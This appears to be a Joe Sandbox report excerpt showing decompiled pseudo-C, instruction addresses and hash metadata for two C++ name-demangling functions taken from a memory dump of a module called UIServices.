                                                    				void* __r14;
                                                    				signed int _t86;
                                                    				char _t115;
                                                    				void* _t116;
                                                    				signed int _t119;
                                                    				void* _t121;
                                                    				void* _t131;
                                                    				void* _t133;
                                                    				intOrPtr _t150;
                                                    				long long* _t156;
                                                    				signed long long _t165;
                                                    				char* _t167;
                                                    				char* _t168;
                                                    				long long _t170;
                                                    				intOrPtr _t175;
                                                    				long long* _t178;
                                                    				long long* _t179;
                                                    				long long* _t180;
                                                    				long long* _t188;
                                                    				intOrPtr* _t190;
                                                    				void* _t221;
                                                    				long long* _t240;
                                                    				long long _t241;
                                                    				void* _t244;
                                                    				void* _t247;
                                                    				void* _t252;
                                                    				void* _t254;
                                                    				void* _t256;
                                                    				void* _t258;
                                                    				void* _t259;
                                                    
                                                    				_t254 = __r11;
                                                    				_t253 = __r10;
                                                    				_t247 = __r8;
                                                    				_t241 = __rsi;
                                                    				_t221 = __rdx;
                                                    				_t185 = __rcx;
                                                    				_t183 = __rbx;
                                                    				_t131 = __edi;
                                                    				_a16 = __rbx;
                                                    				_a24 = __rsi;
                                                    				_t165 =  *0x23c74038; // 0x577607bbd382
                                                    				_v56 = _t165 ^ _t244 - 0x00000070;
                                                    				_t167 =  *0x23c74360; // 0x0
                                                    				_t240 = __rcx;
                                                    				_t115 =  *_t167;
                                                    				_t168 = _t167 + 1;
                                                    				 *0x23c74360 = _t168;
                                                    				r14d = _t115;
                                                    				_t133 = _t115 - 0x45;
                                                    				if (_t133 > 0) goto 0x23c6cc02;
                                                    				if (_t133 == 0) goto 0x23c6cbf8;
                                                    				if (_t115 == 0) goto 0x23c6cbdc;
                                                    				if (_t115 == 0x30) goto 0x23c6cbd2;
                                                    				if (_t115 == 0x31) goto 0x23c6cb6b;
                                                    				if (_t115 == 0x32) goto 0x23c6cb61;
                                                    				if (_t115 == 0x34) goto 0x23c6cb57;
                                                    				_t116 = _t115 - 0x41;
                                                    				if (_t116 - 1 > 0) goto 0x23c6cc2b;
                                                    				E00007FFC7FFC23C6A314(r14d, __rbx, __rcx, __rsi, __r10);
                                                    				goto 0x23c6cf1e;
                                                    				E00007FFC7FFC23C6C50C(__rcx);
                                                    				goto 0x23c6cf1e;
                                                    				E00007FFC7FFC23C6D688(_t121, r14d, _t131, _t183, _t185, _t221, _t240, _t241, _t247, __r10, _t254, _t258);
                                                    				goto 0x23c6cf1e;
                                                    				if ( *_t168 != 0x40) goto 0x23c6cba3;
                                                    				_v96 = 4;
                                                    				 *0x23c74360 = _t168 + 1;
                                                    				_t170 = "NULL";
                                                    				_v104 = _t170;
                                                    				asm("movaps xmm0, [ebp-0x40]");
                                                    				asm("movdqa [ebp-0x50], xmm0");
                                                    				E00007FFC7FFC23C66CF4(_t170, _t185,  &_v120);
                                                    				goto 0x23c6cf1e;
                                                    				_v72 = _t241;
                                                    				_v64 = 0;
                                                    				E00007FFC7FFC23C68150(0x26, _t170, _t183,  &_v72);
                                                    				E00007FFC7FFC23C698C8(_t131,  *_t168 - 0x40, _t170, _t183,  &_v120,  &_v120, _t240, _t241, _t247, _t256);
                                                    				_t188 =  &_v72;
                                                    				E00007FFC7FFC23C66F74(_t188, _t240, _t170);
                                                    				goto 0x23c6cf1e;
                                                    				E00007FFC7FFC23C6C270(_t183, _t188, _t240, _t241, _t170, __r10, _t254, _t258);
                                                    				goto 0x23c6cf1e;
                                                    				 *0x23c74360 = _t170 - 1;
                                                    				 *_t188 = 0x23c71ac0;
                                                    				 *((intOrPtr*)(_t188 + 8)) = 0;
                                                    				goto 0x23c6cf1e;
                                                    				E00007FFC7FFC23C698C8(_t131,  *_t168 - 0x40, 0x23c71ac0, _t183, _t188, _t240, _t240, _t241, _t170, _t256);
                                                    				goto 0x23c6cf1e;
                                                    				if (_t116 - 0x4a <= 0) goto 0x23c6cd86;
                                                    				if (_t116 == 0x4d) goto 0x23c6cd66;
                                                    				if (_t116 == 0x51) goto 0x23c6cc2b;
                                                    				if (_t116 == 0x52) goto 0x23c6cc45;
                                                    				if (_t116 == 0x53) goto 0x23c6cc3a;
                                                    				if (_t116 - 0x54 - 2 <= 0) goto 0x23c6cc45;
                                                    				 *((intOrPtr*)(_t240 + 8)) = 0;
                                                    				 *((char*)(_t240 + 8)) = 2;
                                                    				 *_t240 = _t241;
                                                    				goto 0x23c6cf1e;
                                                    				 *_t188 = _t241;
                                                    				 *((intOrPtr*)(_t188 + 8)) = 0;
                                                    				goto 0x23c6cf1e;
                                                    				E00007FFC7FFC23C6C270(_t183,  &_v120, _t240, _t241, _t170, __r10, _t254, _t258);
                                                    				_t190 = _v120;
                                                    				if (_t190 == 0) goto 0x23c6cc71;
                                                    				 *0x23c701a0();
                                                    				 *((intOrPtr*)( *((intOrPtr*)( *_t190 + 0x18)))) = sil;
                                                    				goto 0x23c6cc75;
                                                    				_v72 = sil;
                                                    				_t86 = atol(??);
                                                    				r15d = 0xfff;
                                                    				if (( *0x23c74370 & 0x00004000) == 0) goto 0x23c6ccc2;
                                                    				_t175 =  *0x23c74378; // 0x0
                                                    				if (_t175 == 0) goto 0x23c6ccc2;
                                                    				 *0x23c701a0();
                                                    				_t150 = _t175;
                                                    				if (_t150 == 0) goto 0x23c6ccc2;
                                                    				r8b = sil;
                                                    				E00007FFC7FFC23C669EC(_t240, _t175);
                                                    				goto 0x23c6cf1e;
                                                    				_t119 = _t86 & r15d;
                                                    				r9d = _t119;
                                                    				E00007FFC7FFC23C6E094(_t86 & r15d, _t175,  &_v72, _t175, "%d", _t252);
                                                    				r8b = sil;
                                                    				E00007FFC7FFC23C669EC( &_v104,  &_v72);
                                                    				r14d = r14d - 0x52;
                                                    				if (_t150 == 0) goto 0x23c6cd5d;
                                                    				r14d = r14d - 2;
                                                    				if (_t150 == 0) goto 0x23c6cd5d;
                                                    				r14d = r14d - 1;
                                                    				if (_t150 == 0) goto 0x23c6cd4d;
                                                    				if (r14d != 1) goto 0x23c6cc2b;
                                                    				_v112 = 0x1a;
                                                    				_v120 = "`generic-method-parameter-";
                                                    				asm("movaps xmm0, [ebp-0x50]");
                                                    				asm("movdqa [ebp-0x50], xmm0");
                                                    				E00007FFC7FFC23C66CF4("`generic-method-parameter-",  &_v88,  &_v120);
                                                    				_t251 =  &_v104;
                                                    				E00007FFC7FFC23C66F74("`generic-method-parameter-",  &_v120,  &_v104);
                                                    				r8b = 0x27;
                                                    				goto 0x23c6cf16;
                                                    				_v112 = 0x19;
                                                    				goto 0x23c6cd17;
                                                    				_t178 = "`template-type-parameter-";
                                                    				goto 0x23c6cd54;
                                                    				E00007FFC7FFC23C6CF48(0x10, _t131, _t183,  &_v120, _t240, _t241,  &_v104, __r10, _t254, _t258);
                                                    				if (_v112 - 1 > 0) goto 0x23c6cc2b;
                                                    				E00007FFC7FFC23C6CACC(_t131, _t183, _t240,  &_v120, _t241,  &_v104, __r10, _t254);
                                                    				goto 0x23c6cf1e;
                                                    				_v72 = _t241;
                                                    				_v64 = 0;
                                                    				E00007FFC7FFC23C68150(0x7b, _t178, _t183,  &_v72);
                                                    				r15d = 0x10;
                                                    				if (_t119 - 0x48 - 2 > 0) goto 0x23c6ce0e;
                                                    				E00007FFC7FFC23C698C8(_t131, _t119 - 0x48 - 2, _t178, _t183,  &_v88,  &_v120, _t240, _t241,  &_v104, 0x23c718e0);
                                                    				E00007FFC7FFC23C67078(_t86 & r15d,  &_v72, _t178,  &_v104);
                                                    				if (_v64 - 1 > 0) goto 0x23c6ce0e;
                                                    				if (_v72 != _t241) goto 0x23c6cde2;
                                                    				_v72 = _t241;
                                                    				_v64 = 0;
                                                    				E00007FFC7FFC23C68150(0x2c, _t178, _t183,  &_v72);
                                                    				goto 0x23c6ce0e;
                                                    				E00007FFC7FFC23C6AA78(_t178, _t183, 0x23c74388, _t259, _t241);
                                                    				_t156 = _t178;
                                                    				if (_t156 == 0) goto 0x23c6cdff;
                                                    				 *_t178 = 0x23c718e0;
                                                    				 *((char*)(_t178 + 8)) = 0x2c;
                                                    				goto 0x23c6ce02;
                                                    				_t179 = _t241;
                                                    				E00007FFC7FFC23C66AA0(_t179, _t183,  &_v72, _t179);
                                                    				r14d = r14d - 0x46;
                                                    				if (_t156 == 0) goto 0x23c6ce99;
                                                    				r14d = r14d - 1;
                                                    				if (_t156 == 0) goto 0x23c6ce38;
                                                    				r14d = r14d - 1;
                                                    				if (_t156 == 0) goto 0x23c6cefa;
                                                    				r14d = r14d - 1;
                                                    				if (_t156 == 0) goto 0x23c6ce99;
                                                    				if (r14d != 1) goto 0x23c6cf0f;
                                                    				E00007FFC7FFC23C6C270(_t183,  &_v88, _t179, _t241,  &_v104, __r10, _t254, _t258);
                                                    				E00007FFC7FFC23C67078(_t86 & r15d,  &_v72, _t179,  &_v104);
                                                    				if (_v64 - 1 > 0) goto 0x23c6ce99;
                                                    				if (_v72 != _t241) goto 0x23c6ce6d;
                                                    				_v72 = _t241;
                                                    				_v64 = 0;
                                                    				E00007FFC7FFC23C68150(0x2c, _t179, _t183,  &_v72);
                                                    				goto 0x23c6ce99;
                                                    				E00007FFC7FFC23C6AA78(_t179, _t183, 0x23c74388, _t259, _t241);
                                                    				if (_t179 == 0) goto 0x23c6ce8a;
                                                    				 *_t179 = 0x23c718e0;
                                                    				 *((char*)(_t179 + 8)) = 0x2c;
                                                    				goto 0x23c6ce8d;
                                                    				_t180 = _t241;
                                                    				E00007FFC7FFC23C66AA0(_t180, _t183,  &_v72, _t180);
                                                    				E00007FFC7FFC23C6C270(_t183,  &_v88, _t180, _t241,  &_v104, __r10, _t254, _t258);
                                                    				E00007FFC7FFC23C67078(_t86 & r15d,  &_v72, _t180, _t251);
                                                    				if (_v64 - 1 > 0) goto 0x23c6cefa;
                                                    				if (_v72 != _t241) goto 0x23c6cece;
                                                    				_v72 = _t241;
                                                    				_v64 = 0;
                                                    				E00007FFC7FFC23C68150(0x2c, _t180, _t183,  &_v72);
                                                    				goto 0x23c6cefa;
                                                    				E00007FFC7FFC23C6AA78(_t180, _t183, 0x23c74388, _t259, _t241);
                                                    				if (_t180 == 0) goto 0x23c6ceeb;
                                                    				 *_t180 = 0x23c718e0;
                                                    				 *((char*)(_t180 + 8)) = 0x2c;
                                                    				goto 0x23c6ceee;
                                                    				E00007FFC7FFC23C66AA0(_t241, _t183,  &_v72, _t241);
                                                    				E00007FFC7FFC23C6C270(_t183,  &_v88, _t241, _t241, _t251, _t253, _t254, _t258);
                                                    				E00007FFC7FFC23C67078(_t86 & r15d,  &_v72, _t241, _t251);
                                                    				r8b = 0x7d;
                                                    				E00007FFC7FFC23C66FA0( &_v72, _t240);
                                                    				return E00007FFC7FFC23C6F5B0(_t86 & r15d, _t240, _v56 ^ _t244 - 0x00000070, _t240);
                                                    			}













































                                                    0x7ffc23c6cacc
                                                    0x7ffc23c6cacc
                                                    0x7ffc23c6cacc
                                                    0x7ffc23c6cacc
                                                    0x7ffc23c6cacc
                                                    0x7ffc23c6cacc
                                                    0x7ffc23c6cacc
                                                    0x7ffc23c6cacc
                                                    0x7ffc23c6cacc
                                                    0x7ffc23c6cad1
                                                    0x7ffc23c6cae5
                                                    0x7ffc23c6caef
                                                    0x7ffc23c6caf3
                                                    0x7ffc23c6cafc
                                                    0x7ffc23c6caff
                                                    0x7ffc23c6cb02
                                                    0x7ffc23c6cb05
                                                    0x7ffc23c6cb0c
                                                    0x7ffc23c6cb0f
                                                    0x7ffc23c6cb12
                                                    0x7ffc23c6cb18
                                                    0x7ffc23c6cb20
                                                    0x7ffc23c6cb29
                                                    0x7ffc23c6cb32
                                                    0x7ffc23c6cb37
                                                    0x7ffc23c6cb3c
                                                    0x7ffc23c6cb3e
                                                    0x7ffc23c6cb44
                                                    0x7ffc23c6cb4d
                                                    0x7ffc23c6cb52
                                                    0x7ffc23c6cb57
                                                    0x7ffc23c6cb5c
                                                    0x7ffc23c6cb61
                                                    0x7ffc23c6cb66
                                                    0x7ffc23c6cb6e
                                                    0x7ffc23c6cb73
                                                    0x7ffc23c6cb7a
                                                    0x7ffc23c6cb85
                                                    0x7ffc23c6cb8c
                                                    0x7ffc23c6cb90
                                                    0x7ffc23c6cb94
                                                    0x7ffc23c6cb99
                                                    0x7ffc23c6cb9e
                                                    0x7ffc23c6cba5
                                                    0x7ffc23c6cbad
                                                    0x7ffc23c6cbb0
                                                    0x7ffc23c6cbb9
                                                    0x7ffc23c6cbc1
                                                    0x7ffc23c6cbc8
                                                    0x7ffc23c6cbcd
                                                    0x7ffc23c6cbd2
                                                    0x7ffc23c6cbd7
                                                    0x7ffc23c6cbdf
                                                    0x7ffc23c6cbed
                                                    0x7ffc23c6cbf0
                                                    0x7ffc23c6cbf3
                                                    0x7ffc23c6cbf8
                                                    0x7ffc23c6cbfd
                                                    0x7ffc23c6cc05
                                                    0x7ffc23c6cc0e
                                                    0x7ffc23c6cc17
                                                    0x7ffc23c6cc1c
                                                    0x7ffc23c6cc21
                                                    0x7ffc23c6cc29
                                                    0x7ffc23c6cc2b
                                                    0x7ffc23c6cc2e
                                                    0x7ffc23c6cc32
                                                    0x7ffc23c6cc35
                                                    0x7ffc23c6cc3a
                                                    0x7ffc23c6cc3d
                                                    0x7ffc23c6cc40
                                                    0x7ffc23c6cc49
                                                    0x7ffc23c6cc4e
                                                    0x7ffc23c6cc55
                                                    0x7ffc23c6cc66
                                                    0x7ffc23c6cc6c
                                                    0x7ffc23c6cc6f
                                                    0x7ffc23c6cc71
                                                    0x7ffc23c6cc79
                                                    0x7ffc23c6cc89
                                                    0x7ffc23c6cc91
                                                    0x7ffc23c6cc93
                                                    0x7ffc23c6cc9d
                                                    0x7ffc23c6cca4
                                                    0x7ffc23c6ccaa
                                                    0x7ffc23c6ccad
                                                    0x7ffc23c6ccaf
                                                    0x7ffc23c6ccb8
                                                    0x7ffc23c6ccbd
                                                    0x7ffc23c6ccc2
                                                    0x7ffc23c6cccc
                                                    0x7ffc23c6ccd8
                                                    0x7ffc23c6ccdd
                                                    0x7ffc23c6cce8
                                                    0x7ffc23c6cced
                                                    0x7ffc23c6ccf1
                                                    0x7ffc23c6ccf3
                                                    0x7ffc23c6ccf7
                                                    0x7ffc23c6ccf9
                                                    0x7ffc23c6ccfd
                                                    0x7ffc23c6cd03
                                                    0x7ffc23c6cd10
                                                    0x7ffc23c6cd17
                                                    0x7ffc23c6cd1f
                                                    0x7ffc23c6cd27
                                                    0x7ffc23c6cd2c
                                                    0x7ffc23c6cd31
                                                    0x7ffc23c6cd3c
                                                    0x7ffc23c6cd41
                                                    0x7ffc23c6cd48
                                                    0x7ffc23c6cd54
                                                    0x7ffc23c6cd5b
                                                    0x7ffc23c6cd5d
                                                    0x7ffc23c6cd64
                                                    0x7ffc23c6cd6a
                                                    0x7ffc23c6cd73
                                                    0x7ffc23c6cd7c
                                                    0x7ffc23c6cd81
                                                    0x7ffc23c6cd88
                                                    0x7ffc23c6cd90
                                                    0x7ffc23c6cd93
                                                    0x7ffc23c6cda2
                                                    0x7ffc23c6cdab
                                                    0x7ffc23c6cdb1
                                                    0x7ffc23c6cdbd
                                                    0x7ffc23c6cdc6
                                                    0x7ffc23c6cdcc
                                                    0x7ffc23c6cdd0
                                                    0x7ffc23c6cdd8
                                                    0x7ffc23c6cddb
                                                    0x7ffc23c6cde0
                                                    0x7ffc23c6cdec
                                                    0x7ffc23c6cdf1
                                                    0x7ffc23c6cdf4
                                                    0x7ffc23c6cdf6
                                                    0x7ffc23c6cdf9
                                                    0x7ffc23c6cdfd
                                                    0x7ffc23c6cdff
                                                    0x7ffc23c6ce09
                                                    0x7ffc23c6ce0e
                                                    0x7ffc23c6ce12
                                                    0x7ffc23c6ce18
                                                    0x7ffc23c6ce1c
                                                    0x7ffc23c6ce1e
                                                    0x7ffc23c6ce22
                                                    0x7ffc23c6ce28
                                                    0x7ffc23c6ce2c
                                                    0x7ffc23c6ce32
                                                    0x7ffc23c6ce3c
                                                    0x7ffc23c6ce48
                                                    0x7ffc23c6ce51
                                                    0x7ffc23c6ce57
                                                    0x7ffc23c6ce5b
                                                    0x7ffc23c6ce63
                                                    0x7ffc23c6ce66
                                                    0x7ffc23c6ce6b
                                                    0x7ffc23c6ce77
                                                    0x7ffc23c6ce7f
                                                    0x7ffc23c6ce81
                                                    0x7ffc23c6ce84
                                                    0x7ffc23c6ce88
                                                    0x7ffc23c6ce8a
                                                    0x7ffc23c6ce94
                                                    0x7ffc23c6ce9d
                                                    0x7ffc23c6cea9
                                                    0x7ffc23c6ceb2
                                                    0x7ffc23c6ceb8
                                                    0x7ffc23c6cebc
                                                    0x7ffc23c6cec4
                                                    0x7ffc23c6cec7
                                                    0x7ffc23c6cecc
                                                    0x7ffc23c6ced8
                                                    0x7ffc23c6cee0
                                                    0x7ffc23c6cee2
                                                    0x7ffc23c6cee5
                                                    0x7ffc23c6cee9
                                                    0x7ffc23c6cef5
                                                    0x7ffc23c6cefe
                                                    0x7ffc23c6cf0a
                                                    0x7ffc23c6cf0f
                                                    0x7ffc23c6cf19
                                                    0x7ffc23c6cf45

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-
                                                    • API String ID: 0-4167119577
                                                    • Opcode ID: 7847c438d7b5cd4743e7c19f9e8803edb50d6b73b90e31d0e5b59828e5d8c847
                                                    • Instruction ID: d93aa2577bae53947a7937efafa1edcd41d401180318f8d8392ba55d1e449f61
                                                    • Opcode Fuzzy Hash: 7847c438d7b5cd4743e7c19f9e8803edb50d6b73b90e31d0e5b59828e5d8c847
                                                    • Instruction Fuzzy Hash: 14D19F22F1867A88FB119B68CC451FC2764FF84784F4482B6DE0D36A96CF3CA545CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 73%
                                                    			E00007FFC7FFC23C6DA5C(void* __ebx, void* __ecx, void* __edx, void* __edi, long long __rbx, long long* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, void* __r11) {
                                                    				void* __r14;
                                                    				intOrPtr _t74;
                                                    				intOrPtr _t75;
                                                    				intOrPtr _t82;
                                                    				void* _t88;
                                                    				void* _t91;
                                                    				void* _t104;
                                                    				signed long long _t105;
                                                    				intOrPtr* _t107;
                                                    				long long _t108;
                                                    				intOrPtr* _t110;
                                                    				intOrPtr* _t113;
                                                    				long long _t118;
                                                    				intOrPtr _t124;
                                                    				long long _t125;
                                                    				long long _t127;
                                                    				intOrPtr _t130;
                                                    				intOrPtr* _t132;
                                                    				intOrPtr* _t134;
                                                    				intOrPtr* _t137;
                                                    				signed long long _t159;
                                                    				intOrPtr* _t163;
                                                    				void* _t165;
                                                    				void* _t166;
                                                    				void* _t168;
                                                    				void* _t171;
                                                    				char* _t175;
                                                    				intOrPtr* _t176;
                                                    				intOrPtr* _t177;
                                                    				char* _t178;
                                                    				void* _t181;
                                                    				void* _t183;
                                                    				long long* _t184;
                                                    				char* _t186;
                                                    
                                                    				_t181 = __r11;
                                                    				_t171 = __r8;
                                                    				_t162 = __rsi;
                                                    				_t104 = _t168;
                                                    				 *((long long*)(_t104 + 0x10)) = __rbx;
                                                    				 *((long long*)(_t104 + 0x18)) = __rsi;
                                                    				 *((long long*)(_t104 + 0x20)) = __rdi;
                                                    				_t166 = _t104 - 0x5f;
                                                    				_t105 =  *0x23c74038; // 0x577607bbd382
                                                    				 *(_t166 + 0x37) = _t105 ^ _t168 - 0x00000090;
                                                    				_t175 =  *0x23c74360; // 0x0
                                                    				r10b = r8b;
                                                    				sil = __edx;
                                                    				_t184 = __rcx;
                                                    				r8d =  *_t175;
                                                    				r8d = r8d + 0xffffffd0;
                                                    				if (r8d - 9 > 0) goto 0x23c6dac5;
                                                    				_t176 = _t175 + 1;
                                                    				_t130 =  *0x23c74350; // 0x0
                                                    				 *0x23c74360 = _t176;
                                                    				E00007FFC7FFC23C66F08(_t130, __rcx);
                                                    				goto 0x23c6dd16;
                                                    				r15d = 0;
                                                    				if ( *_t176 != 0x3f) goto 0x23c6db23;
                                                    				E00007FFC7FFC23C6C838(__ebx, __ecx, 0, __edi, __rbx, _t166 - 0x29, __rcx, __rdi, __rsi);
                                                    				_t107 =  *0x23c74360; // 0x0
                                                    				_t108 = _t107 + 1;
                                                    				 *0x23c74360 = _t108;
                                                    				if ( *_t107 == 0x40) goto 0x23c6dcd0;
                                                    				 *0x23c74360 = _t108 - 1;
                                                    				asm("sbb edi, edi");
                                                    				_t123 =  !=  ? _t186 : 0x23c71ac0;
                                                    				goto 0x23c6dcd0;
                                                    				_t110 = "template-parameter-";
                                                    				_t132 = _t176;
                                                    				r8d = 0x12;
                                                    				r11d = r11d | 0xffffffff;
                                                    				_t74 =  *_t132;
                                                    				if (_t74 == 0) goto 0x23c6db4c;
                                                    				_t88 = _t74 -  *_t110;
                                                    				if (_t88 != 0) goto 0x23c6db4c;
                                                    				r8d = r8d + r11d;
                                                    				if (_t88 != 0) goto 0x23c6db37;
                                                    				if (( *(_t132 + 1) & 0x000000ff) != ( *(_t110 + 1) & 0x000000ff)) goto 0x23c6db6a;
                                                    				 *((intOrPtr*)(_t166 - 0x21)) = 0x14;
                                                    				_t177 = _t176 + 0x13;
                                                    				goto 0x23c6dbaf;
                                                    				_t113 = "generic-type-";
                                                    				_t134 = _t177;
                                                    				r8d = 0xc;
                                                    				_t75 =  *_t134;
                                                    				if (_t75 == 0) goto 0x23c6db8f;
                                                    				_t91 = _t75 -  *_t113;
                                                    				if (_t91 != 0) goto 0x23c6db8f;
                                                    				r8d = r8d + r11d;
                                                    				if (_t91 != 0) goto 0x23c6db7a;
                                                    				if (( *(_t134 + 1) & 0x000000ff) != ( *(_t113 + 1) & 0x000000ff)) goto 0x23c6dc9a;
                                                    				 *((intOrPtr*)(_t166 - 0x21)) = 0xe;
                                                    				_t178 = _t177 + 0xd;
                                                    				 *((long long*)(_t166 - 0x29)) = "`generic-type-";
                                                    				asm("movaps xmm0, [ebp-0x29]");
                                                    				asm("movdqa [ebp-0x9], xmm0");
                                                    				 *0x23c74360 = _t178;
                                                    				E00007FFC7FFC23C6C270( !=  ? _t186 : 0x23c71ac0, _t166 - 0x29, __rcx, _t162, _t171, __r10, _t181, __rcx);
                                                    				if (( *0x23c74370 & 0x00004000) == 0) goto 0x23c6dc77;
                                                    				_t124 =  *0x23c74378; // 0x0
                                                    				if (_t124 == 0) goto 0x23c6dc77;
                                                    				_t137 =  *((intOrPtr*)(_t166 - 0x29));
                                                    				if (_t137 == 0) goto 0x23c6dc16;
                                                    				 *0x23c701a0();
                                                    				 *((intOrPtr*)( *((intOrPtr*)( *_t137 + 0x18)))) = r15b;
                                                    				_t125 =  *0x23c74378; // 0x0
                                                    				goto 0x23c6dc1a;
                                                    				 *((intOrPtr*)(_t166 + 0x27)) = r15b;
                                                    				atol(_t186);
                                                    				_t118 = _t125;
                                                    				 *0x23c701a0();
                                                    				if (_t118 == 0) goto 0x23c6dc48;
                                                    				r8b = r15b;
                                                    				E00007FFC7FFC23C669EC(_t166 - 0x29, _t118);
                                                    				goto 0x23c6dcca;
                                                    				E00007FFC7FFC23C66CF4(_t118, _t166 + 0x17, _t166 - 9);
                                                    				E00007FFC7FFC23C66F74(_t118, _t166 - 9, _t166 - 0x29);
                                                    				r8b = 0x27;
                                                    				E00007FFC7FFC23C66FA0(_t166 - 9, _t166 + 7);
                                                    				goto 0x23c6dcca;
                                                    				E00007FFC7FFC23C66CF4(_t118, _t166 + 7, _t166 - 9);
                                                    				E00007FFC7FFC23C66F74(_t118, _t166 - 9, _t166 - 0x29);
                                                    				goto 0x23c6dc69;
                                                    				if (r10b == 0) goto 0x23c6dcb7;
                                                    				if ( *_t178 != 0x40) goto 0x23c6dcb7;
                                                    				 *0x23c74360 = _t178 + 1;
                                                    				goto 0x23c6dcd0;
                                                    				r8b = 0x40;
                                                    				E00007FFC7FFC23C66C44(_t118, _t186, _t166 + 7, 0x23c74360, _t162, _t183);
                                                    				_t127 =  *_t118;
                                                    				_t82 =  *((intOrPtr*)(_t118 + 8));
                                                    				if (sil == 0) goto 0x23c6dd0f;
                                                    				_t163 =  *0x23c74350; // 0x0
                                                    				if ( *_t163 == 9) goto 0x23c6dd0f;
                                                    				if (_t127 == 0) goto 0x23c6dd0f;
                                                    				E00007FFC7FFC23C6AA78(_t118, _t127, 0x23c74388, 0x23c74360, _t163, _t165);
                                                    				if (_t118 == 0) goto 0x23c6dd0f;
                                                    				 *_t118 = _t127;
                                                    				 *((intOrPtr*)(_t118 + 8)) = _t82;
                                                    				_t159 =  *_t163;
                                                    				 *_t163 = _t159 + 1;
                                                    				 *((long long*)(_t163 + 0x10 + _t159 * 8)) = _t118;
                                                    				 *_t184 = _t127;
                                                    				 *((intOrPtr*)(_t184 + 8)) = _t82;
                                                    				return E00007FFC7FFC23C6F5B0(_t159 + 1, _t184,  *(_t166 + 0x37) ^ _t168 - 0x00000090, _t159);
                                                    			}





































                                                    0x7ffc23c6da5c
                                                    0x7ffc23c6da5c
                                                    0x7ffc23c6da5c
                                                    0x7ffc23c6da5c
                                                    0x7ffc23c6da5f
                                                    0x7ffc23c6da63
                                                    0x7ffc23c6da67
                                                    0x7ffc23c6da70
                                                    0x7ffc23c6da7b
                                                    0x7ffc23c6da85
                                                    0x7ffc23c6da89
                                                    0x7ffc23c6da90
                                                    0x7ffc23c6da93
                                                    0x7ffc23c6da96
                                                    0x7ffc23c6da99
                                                    0x7ffc23c6da9d
                                                    0x7ffc23c6daa5
                                                    0x7ffc23c6daa7
                                                    0x7ffc23c6daad
                                                    0x7ffc23c6dab4
                                                    0x7ffc23c6dabb
                                                    0x7ffc23c6dac0
                                                    0x7ffc23c6dac5
                                                    0x7ffc23c6dacc
                                                    0x7ffc23c6dad4
                                                    0x7ffc23c6dadf
                                                    0x7ffc23c6dae8
                                                    0x7ffc23c6daeb
                                                    0x7ffc23c6daf5
                                                    0x7ffc23c6db05
                                                    0x7ffc23c6db12
                                                    0x7ffc23c6db1a
                                                    0x7ffc23c6db1e
                                                    0x7ffc23c6db23
                                                    0x7ffc23c6db2a
                                                    0x7ffc23c6db2d
                                                    0x7ffc23c6db33
                                                    0x7ffc23c6db37
                                                    0x7ffc23c6db3b
                                                    0x7ffc23c6db3d
                                                    0x7ffc23c6db3f
                                                    0x7ffc23c6db47
                                                    0x7ffc23c6db4a
                                                    0x7ffc23c6db54
                                                    0x7ffc23c6db5d
                                                    0x7ffc23c6db64
                                                    0x7ffc23c6db68
                                                    0x7ffc23c6db6a
                                                    0x7ffc23c6db71
                                                    0x7ffc23c6db74
                                                    0x7ffc23c6db7a
                                                    0x7ffc23c6db7e
                                                    0x7ffc23c6db80
                                                    0x7ffc23c6db82
                                                    0x7ffc23c6db8a
                                                    0x7ffc23c6db8d
                                                    0x7ffc23c6db97
                                                    0x7ffc23c6dba4
                                                    0x7ffc23c6dbab
                                                    0x7ffc23c6dbaf
                                                    0x7ffc23c6dbb7
                                                    0x7ffc23c6dbbb
                                                    0x7ffc23c6dbc0
                                                    0x7ffc23c6dbc7
                                                    0x7ffc23c6dbd6
                                                    0x7ffc23c6dbdc
                                                    0x7ffc23c6dbe6
                                                    0x7ffc23c6dbec
                                                    0x7ffc23c6dbf3
                                                    0x7ffc23c6dc04
                                                    0x7ffc23c6dc0a
                                                    0x7ffc23c6dc0d
                                                    0x7ffc23c6dc14
                                                    0x7ffc23c6dc16
                                                    0x7ffc23c6dc1e
                                                    0x7ffc23c6dc26
                                                    0x7ffc23c6dc29
                                                    0x7ffc23c6dc32
                                                    0x7ffc23c6dc34
                                                    0x7ffc23c6dc3e
                                                    0x7ffc23c6dc43
                                                    0x7ffc23c6dc50
                                                    0x7ffc23c6dc60
                                                    0x7ffc23c6dc69
                                                    0x7ffc23c6dc70
                                                    0x7ffc23c6dc75
                                                    0x7ffc23c6dc7f
                                                    0x7ffc23c6dc8f
                                                    0x7ffc23c6dc98
                                                    0x7ffc23c6dc9d
                                                    0x7ffc23c6dca3
                                                    0x7ffc23c6dcab
                                                    0x7ffc23c6dcb5
                                                    0x7ffc23c6dcb7
                                                    0x7ffc23c6dcc5
                                                    0x7ffc23c6dcca
                                                    0x7ffc23c6dccd
                                                    0x7ffc23c6dcd3
                                                    0x7ffc23c6dcd5
                                                    0x7ffc23c6dcdf
                                                    0x7ffc23c6dce4
                                                    0x7ffc23c6dcf2
                                                    0x7ffc23c6dcfa
                                                    0x7ffc23c6dcfc
                                                    0x7ffc23c6dcff
                                                    0x7ffc23c6dd02
                                                    0x7ffc23c6dd08
                                                    0x7ffc23c6dd0a
                                                    0x7ffc23c6dd0f
                                                    0x7ffc23c6dd12
                                                    0x7ffc23c6dd41

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
